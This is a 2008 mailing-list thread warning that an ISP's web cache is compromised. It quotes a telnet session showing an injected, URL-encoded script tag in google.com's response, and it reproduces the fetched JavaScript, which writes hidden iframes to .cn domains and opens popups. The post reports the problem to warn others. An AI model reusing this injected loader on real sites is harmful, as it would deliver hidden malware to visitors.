[General] FT Cache Compromise Details
Majed B.
majedb at gmail.com
Fri Dec 5 00:08:14 +03 2008
That's just sad...
Anyone knows what kind of cahing equipment they're using?
> --- On Thu, 12/4/08, Burhan Khalid <burhan at kuwaitnet.net> wrote:
>
>> From: Burhan Khalid <burhan at kuwaitnet.net>
>> Subject: [General] FT Cache Compromise Details
>> To: "General OpenSource Discussion" <general at oskw.org>
>> Date: Thursday, December 4, 2008, 4:41 PM
>> I don't think I need to say this, but do not click on
>> any links in this email.
>>
>> Salaam All:
>>
>> Just as a reminder, as of this email date, the cache is
>> still compromised (see paste below).
>>
>> [burhan at t61p ~]$ telnet google.com 80
>> Trying 72.14.205.100...
>> Connected to google.com.
>> Escape character is '^]'.
>> GET / HTTP/1.1
>> Host: www.google.com
>>
>> HTTP/1.1 200 OK
>> Content-Type: text/html; charset=ISO-8859-1
>> Set-Cookie:
>> PREF=ID=08e985e2eb9bfbbe:TM=1228395740:LM=1228395740:S=6SIcev5-b4ZYec5K;
>> expires=Sat, 04-Dec-2010 13:02:20 GMT; path=/;
>> domain=.google.com
>>
>> <script language=javascript
>> src=http://%77%2E%63%36%36%64%2E%63%6E/lg.js></script>
>> 16e2
>>
>> Apparently its loading something from a chinese website
>> (58.53.128.82), a javascript file, which does what normal
>> such exploits do - loads in an inframe content form another
>> compromised site, and opens popups:
>>
>> function Get(){
>> var Then = new Date()
>> Then.setTime(Then.getTime() + 1*40*60*1000)
>> var cookieString = new String(document.cookie)
>> var cookieHeader = "cainibi="
>> var beginPosition = cookieString.indexOf(cookieHeader)
>> if (beginPosition != -1){
>> } else
>> { document.cookie =
>> "cainibi=chongxinzuo;expires="+ Then.toGMTString()
>> document.write("<div
>> style=\"display:none\">");
>> document.write("<iframe src=http://se.c66a.cn/
>> width=0 height=0></iframe>");
>> window.open("http://liaobamm.com");
>>
>> }
>> }
>> document.write("<iframe
>> src=http://w.c66d.cn/logo.htm width=100
>> height=0></iframe>");
>> Get();
>>
>>
>> If anyone has an inside ear on FT, tell them to block
>> access at their firewall to the offending IPs. Hell, they
>> block Skype, why can't they block something I don't
>> want.
>>
>> Enjoy,
>> --
>> Burhan Khalid
>>
>> _______________________________________________
>> General mailing list
>> General at oskw.org
>> http://mail.oskw.org/mailman/listinfo/general_oskw.org
>
>
> _______________________________________________
> General mailing list
> General at oskw.org
> http://mail.oskw.org/mailman/listinfo/general_oskw.org
>
--
Majed B.
More information about the General
mailing list